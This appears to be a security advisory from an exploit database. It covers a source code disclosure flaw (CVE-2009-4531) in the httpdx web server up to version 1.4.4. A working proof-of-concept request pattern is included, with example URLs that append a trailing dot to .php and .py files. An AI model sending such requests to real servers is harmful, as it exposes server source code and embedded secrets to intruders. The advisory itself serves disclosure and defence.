Topic : | httpdx <= 1.4.4 Remote Source Disclosure
|
SecurityAlert : 6907
CVE : CVE-2009-4531
CWE : CWE-200
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : Dr_IDE
Published : 02.01.2010
Affected Software : | jazu100:httpdx:1.4.4 and previous versions |
 Advisory Content : ################################################
#
# httpdx <= 1.4.4 Remote Source Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
# Download: httpdx.sourceforge.net/downloads/
#
################################################
- Description -
httpdx Web Server <= 1.4.4 is a Windows based HTTP server. This is the
latest
version of the application available.
httpdx is vulnerable to remote arbitrary source code disclosure by the
following means.
- Technical Details -
http://[ webserver IP]/[ file ][.]
http://172.16.2.101/index.html.
http://172.16.2.101/test.py.
http://172.16.2.101/test.php.
[pocoftheday.blogspot.com]
References :
http://xforce.iss.net/xforce/xfdb/53733
http://www.osvdb.org/58857
http://secunia.com/advisories/37013
http://pocoftheday.blogspot.com/2009/10/httpdx-144-remote-arbitrary-source.html
http://packetstormsecurity.org/0910-exploits/httpdx-disclose.txt
http://freetexthost.com/eiyfyt0km5
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|